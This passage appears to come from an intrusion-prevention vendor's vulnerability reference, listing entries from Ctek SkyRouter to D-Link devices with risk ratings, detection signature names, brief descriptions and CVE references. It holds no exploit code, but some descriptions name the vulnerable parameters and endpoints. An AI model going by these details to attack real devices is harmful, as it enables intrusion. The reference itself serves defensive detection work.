About this vulnerability: A Ctek SkyRouter Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ctek SkyRouter
Type: Input Validation
Description: A vulnerability in Ctek SkyRiuter 4200 and 4300, in apps/a3/cfg_ethping.cgi, which allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS parameter for a 'u' action.
Situation: HTTP_CRL-Ctek-SkyRouter-Command-Execution
References:
CVE-2011-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5010
BID-50867
http://www.securityfocus.com/bid/50867
OSVDB-77497
http://www.osvdb.org/77497
Back to top

CTL_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow

About this vulnerability: A buffer overflow vulnerability in Cisco Systems Unified CallManager
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Unified CallManager; Cisco Systems Unified Communications Manager
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Cisco Unified Communications Manager. The flaw is due to a logic error in the Certificate Trust List (CTL) Provider service when processing client requests. A remote unauthenticated attacker can trigger this vulnerability by sending crafted message to the target server. Successful attack could allow for raising a denial of service condition or injecting and executing arbitrary code with the privileges of the affected service.
Situation: Generic_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
TLS_CS-Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
References:
CVE-2008-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0027
BID-27313
http://www.securityfocus.com/bid/27313
Back to top

CUPS-Gif-Decoding-Routine-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Common UNIX Printing System (CUPS)
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Common Unix Printing System (CUPS). The vulnerability is due to a boundary error in the handling of GIF format files and may be exploited by remote attackers to compromise a vulnerable system or cause a denial of service.
Situation: HTTP_CS-CUPS-Gif-Decoding-Routine-Buffer-Overflow
References:
CVE-2008-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373
BID-28544
http://www.securityfocus.com/bid/28544
Back to top

CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177

About this vulnerability: An attempt to exploit a vulnerability in cups-filters detected
Risk: High
First detected in: sgpkg-ips-1783-5242
Last changed: sgpkg-ips-1783-5242
Platform: Generic
Software: cups-filters
Type: Input Validation
Description: CUPS is an open-source printing system, and cups-filters is a service that provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to "FoomaticRIPCommandLine" via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE_2024-47176, this can lead to remote command execution.
Situation: File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177
References:
CVE-2024-47177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47177
Back to top

CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow

About this vulnerability: An integer overflow vulnerability in Common UNIX Printing System (CUPS)
Risk: High
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Integer Overflow
Description: There is an integer overflow vulnerability in the Common UNIX Printing System (CUPS). There is a boundary error in the texttops application when calculating the page size used for storing PostScript data. A remote attacker can exploit this vulnerability to compromise a vulnerable system.
Situation: HTTP_CS-CUPS-Text-To-PostScript-texttops-Filter-Integer-Overflow
References:
CVE-2008-3640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3640
BID-31690
http://www.securityfocus.com/bid/31690
Back to top

Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution

About this vulnerability: A vulnerability in cURL Project libcurl
Risk: Moderate
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cURL
Type: Malfunction
Description: A heap buffer underflow vulnerability exists in cURL and libcurl. The vulnerability is due error when parsing a cookie path in an HTTP response. A remote, unauthenticated attackers can exploit this vulnerability by enticing user to perform a cURL on a crafted URL or provide malicious HTTP response to an application that uses libcurl. Successful exploitation could cause arbitrary code execution, unsuccessful exploitation may cause a crash resulting a denial of service condition.
Situation: HTTP_SHS-Curl-And-Libcurl-Cookie-Path-Parsing-Remote-Code-Execution
References:
CVE-2015-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145
OSVDB-121130
http://www.osvdb.org/121130
Back to top

Curl-And-Libcurl-md5-Digest-Buffer-Overflow

About this vulnerability: A vulnerability in cURL Project cURL
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cURL
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability exists in cURL/libcurl. The vulnerability is due to an error in Curl_sasl_create_digest_md5_message() while negotiating SASL DIGEST-MD5 authentication. A remote attacker can exploit this vulnerability by enticing a user to connect to a malicious server. This can lead to code execution in the context of the affected application. If code execution is unsuccessful, a denial of service condition may result.
Situation: POP3_SS-Curl-And-Libcurl-md5-Digest-Buffer-Overflow
References:
CVE-2013-0249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0249
OSVDB-89988
http://www.osvdb.org/89988
Back to top

Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in cURL Project cURL
Risk: Moderate
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cURL
Type: Buffer Overflow
Description: Insufficient validation of NTLM type-2 messages when creating a type-3 request message in the Curl_auth_create_ntlm_type3_message function causes a stack buffer overflow vulnerability. A successful attack may allow an attacker to run arbitrary code on the target system.
Situation: HTTP_SHS-Curl-And-Libcurl-Ntlm-Type-3-Message-Creation-Stack-Based-Buffer-Overflow
References:
CVE-2019-3822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3822
Back to top

Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in cURL Project cURL
Risk: High
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cURL
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability exists in cURL/libcurl which allows remote attackers to execute arbitrary code by enticing a target user into running cURL on a malicious URL.
Situation: TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF
TFTP_SS-Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow
References:
CVE-2019-5436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436
Back to top

Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in cURL Project cURL
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cURL
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability exists in cURL/libcurl which allows remote attackers to execute arbitrary code due to improper allocation of memory when processing TFTP responses in tftp_receive_packet().
Situation: Generic_UDP-Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow
References:
CVE-2019-5482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5482
Back to top

Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545

About this vulnerability: A vulnerability in cURL
Risk: High
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: cURL
Type: Malfunction
Description: A heap buffer overflow vulnerability has been reported in cURL/libcurl.
Situation: Generic_TCP-Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545
HTTP_SHS-Suspiciously-Long-Reply-Header
References:
CVE-2023-38545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38545
Back to top

Cutwail-Bot

About this vulnerability: Cutwail Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Cutwail is a Botnet mostly used for sending e-mail spam.
Situation: HTTP_CSU-Cutwail-Bot-Activity
Back to top

CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow

About this vulnerability: Annotate command buffer overflow vulnerability in CVS
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CVS
Type: Buffer Overflow
Description: CVS has a buffer overflow vulnerability due to copying the revision number string to a fixed size buffer without boundary checking when handling the annotate command. A successful exploitation of this vulnerability leads to a DoS condition.
Situation: VC_CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow
References:
CVE-2005-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0753
BID-13217
http://www.securityfocus.com/bid/13217
OSVDB-15670
http://www.osvdb.org/15670
Back to top

CVS-Directory-Request-Double-Free-Heap-Corruption-Vulnerability

About this vulnerability: Heap corruption in CVS pserver
Risk: Critical
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: CVS
Type: Malfunction
Description: A flaw in CVS pserver can be exploited by a malicious user to gain superuser access to the system.
Situation: VC_CVS-Directory-Request-Double-Free
References:
CVE-2003-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0015
BID-6650
http://www.securityfocus.com/bid/6650
Back to top

CVS-Entry-Line-Flag-Heap-Overflow

About this vulnerability: CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: CVS
Type: Malfunction
Description: CVS is prone to a remote heap overflow vulnerability. This issue presents itself during the handling of user-supplied input for entry lines with 'modified' and 'unchanged' flags. This vulnerability can allow an attacker to overflow a vulnerable buffer on the heap, possibly leading to arbitrary code execution.
Situation: VC_CVS-Entry-Line-Flag-Heap-Overflow-Linux
VC_CVS-Entry-Line-Flag-Heap-Overflow-BSD
References:
CVE-2004-0396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0396
BID-10384
http://www.securityfocus.com/bid/10384
OSVDB-6305
http://www.osvdb.org/6305
Back to top

CVS-Error-Prog-Name-Double-Free

About this vulnerability: Double-free vulnerability for the error_prog_name string in CVS
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: CVS
Type: Malfunction
Description: CVS feature versions 1.12.8 and earlier, stable versions 1.11.16 and earlier running on Linux operating systems have a double-free vulnerability with error_prog_name, which is utilized in error messages and the Argumentx command. The Argumentx command fails to validate if there is an argument in the argument list, when adding additional data to a previously supplied argument. A remote attacker could exploit this vulnerability to execute arbitrary code on the system.
Situation: VC_CVS-Argumentx-Command-Double-Free
VC_CVS-Error-Prog-Name-Double-Free
References:
CVE-2004-0416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0416
BID-10499
http://www.securityfocus.com/bid/10499
OSVDB-6831
http://www.osvdb.org/6831
Back to top

CVS-File-Existence-Information-Disclosure

About this vulnerability: A vulnerability in CVS
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CVS
Type: Malfunction
Description: A weakness exists in the Concurrent Versions System (CVS) with the cvs "history" command. An anonymous or low-privileged attacker can exploit this weakness to gain information about files on a CVS server.
Situation: VC_CVS-File-Existence-Information-Disclosure
References:
CVE-2004-0788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0788
BID-11195
http://www.securityfocus.com/bid/11195
Back to top

CVS-Max-Dotdot-Integer-Overflow

About this vulnerability: Integer overflow in the "Max-dotdot" CVS protocol command
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: CVS
Type: Malfunction
Description: An integer overflow within the "Max-dotdot" CVS protocol command allows crashing the CVS server. While CVS server processes are usually forked, a crash usually leaves data in the temporary file directory. This means that on non-partitioned servers this bug could be used to fill the hard-disk completely.
Situation: VC_CVS-Max-Dotdot-Integer-Overflow
References:
CVE-2004-0417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0417
BID-10499
http://www.securityfocus.com/bid/10499
OSVDB-6832
http://www.osvdb.org/6832
Back to top

CyberArk-Password-Vault-Web-Access-Remote-Code-Execution

About this vulnerability: A vulnerability in CyberArk Password Vault Web Access
Risk: High
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CyberArk Password Vault Web Access
Type: Input Validation
Description: There exists a remote code execution vulnerability in CyberArk Password Vault Web Access application. A remote attacker can construct a malicious request which enables the attacker to gain unauthenticated remote code execution on the affected system.
Situation: HTTP_CSH-CyberArk-Password-Vault-Web-Access-Remote-Code-Execution
References:
CVE-2018-9843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9843
Back to top

Cyberpanel-Incorrect-Default-Permissions-Vulnerability

About this vulnerability: A vulnerability in CyberPanel
Risk: Moderate
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: CyberPanel
Type: Input Validation
Description: A command injection vulnerability has been reported in CyberPanel. The vulnerability is due to improper validation of user input when using the getresetstatus API endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary command execution under the security context of the root user.
References:
CVE-2024-51378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51378
Back to top

Cyberpanel-Remote-Code-Execution-CVE-2024-51567

About this vulnerability: A vulnerability in CyberPanel
Risk: Critical
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: CyberPanel
Type: Input Validation
Description: An authentication bypass vulnerability together with a command execution vulnerability in CyberPanel versions through 2.3.6 and 2.3.7 allow a remote attacker to execute arbitrary code.
Situation: HTTP_CS-Cyberpanel-Getresetstatus-Command-Injection
References:
CVE-2024-51567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51567
Back to top

Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568

About this vulnerability: An attempt to exploit a vulnerability in CyberPanel detected
Risk: High
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Generic
Software: CyberPanel
Type: Input Validation
Description: CyberPanel before 2.3.5 allows command injection via the "completePath" parameter in the ProcessUtilities.outputExecutioner() sink. The "/filemanager/upload" (aka File Manager upload) endpoint allows unauthenticated remote code execution using shell metacharacters.
Situation: HTTP_CRL-Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568
References:
CVE-2024-51568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51568
Back to top

Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376

About this vulnerability: A vulnerability in CyberPanel
Risk: High
First detected in: sgpkg-ips-1872-5242
Last changed: sgpkg-ips-1872-5242
Platform: Generic
Software: CyberPanel
Type: Input Validation
Description: An vulnerability in CyberPanel, versions before v2.3.8, which allows remote attackers to execute arbitrary code on a target server due to improper validation of user input when calling the submitWebsiteCreation function.
Situation: HTTP_CS-Cyberpanel-submitWebsiteCreation-Command-Injection-CVE-2024-53376
References:
CVE-2024-53376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53376
Back to top

Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal

About this vulnerability: A vulnerability in CyberPower PowerPanel Business
Risk: High
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: CyberPower PowerPanel Business
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in CyberPower PowerPanel Business. The vulnerability is due to improper validation of filenames in zip files when uploading configuration profiles. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM or the root user.
Situation: File-Zip_Cyberpower-Powerpanel-Business-Import-Profile-Directory-Traversal
References:
CVE-2024-33615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33615
Back to top

Cyberstop-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Cyberstop HTTP server
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cyberstop Web Server
Type: Malfunction
Description: Cyberstop HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send an URL request appended with an MSDOS device name to the server to cause the server to crash.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2002-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200
BID-3929
http://www.securityfocus.com/bid/3929
OSVDB-11346
http://www.osvdb.org/11346
Back to top

Cycbot-Bot

About this vulnerability: Cycbot Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Cycbot is a Bot that creates a backdoor on the infected machine. It may also redirect browser traffic and install additional malware.
Situation: HTTP_CSH-Cycbot-Bot-Traffic
Back to top

Cyclope-Employee-Surveillance-Solution-SQL-Injection

About this vulnerability: A Cyclope Employee Surveillance Solution SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cyclope Employee Surveillance Solution
Type: SQL Injection
Description: A vulnerability in Cyclope Employee Surveillance Solution, versions 6.2 and before, that allows remote attackers to manipulate the SQL query and execute arbitrary code due to the mishandling of the username parameter.
Situation: HTTP_CRL-Cyclope-Employee-Surveillance-Solution-SQL-Injection
References:
OSVDB-84517
http://www.osvdb.org/84517
Back to top

CYME-Multiple-Products-Chartfx.clientserver.core.dll-Remote-Code-Execution

About this vulnerability: A vulnerability in CYME Distribution System Analysis
Risk: Moderate
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CYME Distribution System Analysis; CYME Power Engineering Software
Type: Malfunction
Description: There is a code execution vulnerability in CYME multiple products. The vulnerability is due to insufficient input validation while handling parameters to the ChartFX ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site. This can lead to code execution in the context of the affected user. If code execution is unsuccessful, a denial of service condition may result.
Situation: File-Text_CYME-Multiple-Products-Chartfx-Remote-Code-Execution
References:
OSVDB-85894
http://www.osvdb.org/85894
Back to top

Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow

About this vulnerability: A vulnerability in Cyrus IMAP Server
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cyrus IMAP Server
Type: Buffer Overflow
Description: There is a vulnerability in the way Cyrus IMAP Server processes the LOGIN commands. When the server option IMAPMAGICPLUS is enabled, an overly long username parameter passed to these commands will trigger a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code on the target with the privileges of standard system user.
Situation: IMAP_Cyrus-IMAP-Server-IMAPMAGICPLUS-Buffer-Overflow
References:
CVE-2004-1011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1011
Back to top

D-Link-Backdoor-CVE-2013-6026

About this vulnerability: A known backdoor in D-Link routers
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: D-Link
Type: Backdoor
Description: The web interface on various D-Link routers contains a backdoor, which allows remote attackers to bypass authentication via a specific User-Agent HTTP header.
Situation: HTTP_CSH-D-Link-Backdoor-CVE-2013-6026
References:
CVE-2013-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6026
Back to top

D-Link-Central-WiFiManager-SQL-Injection

About this vulnerability: A vulnerability in D-Link Central WiFi Manager
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: D-Link
Type: SQL Injection
Description: There exists a vulberability in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 which allows remote attackers to add and remove users, and to retrieve usernames, password hashes, and other data due to an exposed API endpoint in /Public/Conn.php.
Situation: HTTP_CRL-D-Link-Central-WiFiManager-SQL-Injection
References:
CVE-2019-13373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13373
Back to top

D-Link-Command-Injection-CVE-2019-16920

About this vulnerability: A vulnerability in D-Link routers
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command injection vulnerability has been reported in D-Link DIR-655, DIR-866L, DIR-652, and DHP-1565 routers. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code.
Situation: HTTP_CRL-D-Link-Command-Injection-CVE-2019-16920
References:
CVE-2019-16920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16920
Back to top

D-Link-Command-Injection-CVE-2024-3273

About this vulnerability: A vulnerability D-Link NAS devices
Risk: High
First detected in: sgpkg-ips-1713-5242
Last changed: sgpkg-ips-1713-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command injection vulnerability together with publicly known hardcoded credentials in nas_sharing.cgi of various out-of-support D-Link NAS devices may allow for unauthenticated command execution.
Situation: HTTP_CSU-D-Link-Command-Injection-CVE-2024-3273
References:
CVE-2024-3273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3273
Back to top

D-Link-CWM-100-Remote-Code-Execution

About this vulnerability: A vulnerability in D-Link CWM 100
Risk: High
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link CWM 100
Type: Input Validation
Description: There exists a vulnerability in D-Link CWM 100, versions before v1.03R0100_BETA6, which allows remote attackers to execute arbitrary PHP code due to the insufficient validation of the username cookie header.
Situation: HTTP_CS-D-Link-CWM-100-Remote-Code-Execution
References:
CVE-2019-13372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13372
Back to top

D-Link-D-View-Adddv7probe-External-Entity-Injection

About this vulnerability: A vulnerability in D-Link D-View 8
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Generic
Software: D-Link D-View
Type: Input Validation
Description: An XXE vulnerability exists in D-Link D-View. This vulnerability is due to improper input validation in the addDv7Probe function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the disclosure of information in the context of SYSTEM.
Situation: HTTP_CS-D-Link-D-View-Adddv7probe-External-Entity-Injection
References:
CVE-2023-44412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44412
Back to top

D-Link-D-View-Executewmiccmd-Command-Injection

About this vulnerability: A vulnerability in D-Link D-View
Risk: Moderate
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: D-Link D-View
Type: Input Validation
Description: Improper validation of a user-supplied string causes a command injection vulnerability in D-Link D-View. A successful exploitation can allow an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-D-Link-D-View-Executewmiccmd-Command-Injection
References:
CVE-2024-5297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5297
Back to top

D-Link-D-View-Tftpreceivefilehandler-Directory-Traversal

About this vulnerability: A vulnerability in D-Link D-View
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: D-Link D-View
Type: Directory Traversal
Description: A directory traversal exists in D-Link D-View. The vulnerability is due to input validation error in TftpReceiveFileHandler class. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.
Situation: TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal
References:
CVE-2023-32165
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32165
Back to top

D-Link-D-View-Uploadfile-Directory-Traversal

About this vulnerability: A vulnerability in D-Link D-View 8
Risk: Moderate
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: D-Link
Type: Directory Traversal
Description: A directory traversal vulnerability been reported for D-Link D-View. This vulnerability is due to improper input validation in the uploadFile function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result arbitrary file creation in the context of SYSTEM.
Situation: HTTP_CS-D-Link-D-View-Uploadfile-Directory-Traversal
References:
CVE-2023-32166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32166
Back to top

D-Link-D-View-Uploadmib-Directory-Traversal

About this vulnerability: A vulnerability in D-Link D-View
Risk: High
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: D-Link D-View
Type: Directory Traversal
Description: A directory traversal vulnerability been reported for D-Link D-View. This vulnerability is due to improper input validation in the uploadMib function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or deletion and potential code execution in the context of SYSTEM.
Situation: HTTP_CS-D-Link-D-View-Uploadmib-Directory-Traversal
References:
CVE-2023-32167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32167
Back to top

D-Link-DAP-1160-Unauthenticated-Remote-Reboot

About this vulnerability: An attempt to exploit a vulnerability in D-Link DAP-1160 detected.
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Insecure Configuration
Description: A vulnerability in the D-Link DAP-1160, which has the DCCD deamon listening on UDP port 2003, which allows unathenticated remote attackers to send and execute commands to the device.
Situation: Generic_UDP-D-Link-DAP-1160-Unauthenticated-Remote-Command
References:
BID-41187
http://www.securityfocus.com/bid/41187
OSVDB-66165
http://www.osvdb.org/66165
Back to top

D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078

About this vulnerability: A vulnerability in D-Link
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: D-Link
Type: Malfunction
Description: An unauthenticated /config/getuser endpoint in D-Link DCS-2530L and DCS-2670L devices allows a remote attacker to retrieve the administrator password.
Situation: HTTP_CSU-D-Link-DCS-2530L-DCS-2670L-Password-Disclosure-CVE-2020-25078
References:
CVE-2020-25078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25078
Back to top

D-Link-DCS-930L-Command-Execution-CVE-2016-11021

About this vulnerability: A vulnerability in D-Link DCS-930L
Risk: High
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A command execution vulnerability has been reported in the D-Link DCS-930L wireless network cameras with firmware versions before 2.12.
Situation: HTTP_CRL-D-Link-DCS-930L-Command-Execution-CVE-2016-11021
References:
CVE-2016-11021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-11021
Back to top

D-Link-DCS-931L-File-Upload

About this vulnerability: A D-Link DCS-931L File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Insecure Configuration
Description: A vulnerability in D-Link DCS-931L with firmware 1.04, which allows remote attackers to execute arbitrary code by uploading files with executable extensions.
Situation: HTTP_CRL-D-Link-DCS-931L-File-Upload
References:
CVE-2015-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2049
Back to top

D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382

About this vulnerability: A vulnerability in multiple D-Link routers
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: D-Link
Type: Code Injection
Description: A command injection vulnerability has been reported in D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers. This vulnerability can allow unauthenticated attackers to execute arbitrary commands via crafted HTTP requests to ddns_check.ccp.
Situation: HTTP_CRL-D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382
References:
CVE-2021-45382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45382
Back to top

D-Link-Devices-Unauthenticated-ssdpcgi-RCE

About this vulnerability: A vulnerability in D-Link ssdpcgi function
Risk: High
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: D-Link
Type: Input Validation
Description: There exists a vulnerability in multiple D-Link devices that allows remote attackers to execute remote code due to the insufficient input valitation of the ssdpcgi function.
Situation: Generic_UDP-D-Link-Devices-Unauthenticated-ssdpcgi-RCE
References:
CVE-2019-20215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20215
Back to top

D-Link-Devices-UPnP-Soap-Command-Execution

About this vulnerability: A D-Link Devices UPnP Soap Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: D-Link
Type: Input Validation
Description: A vulnerability in multiple D-Link devices which allows remote attackers to execute arbitrary commands due to insufficient input validation.
Situation: HTTP_CRL-D-Link-Devices-UPnP-Soap-Command-Execution
References:
BID-61005
http://www.securityfocus.com/bid/61005
OSVDB-94924
http://www.osvdb.org/94924
Back to top

D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability

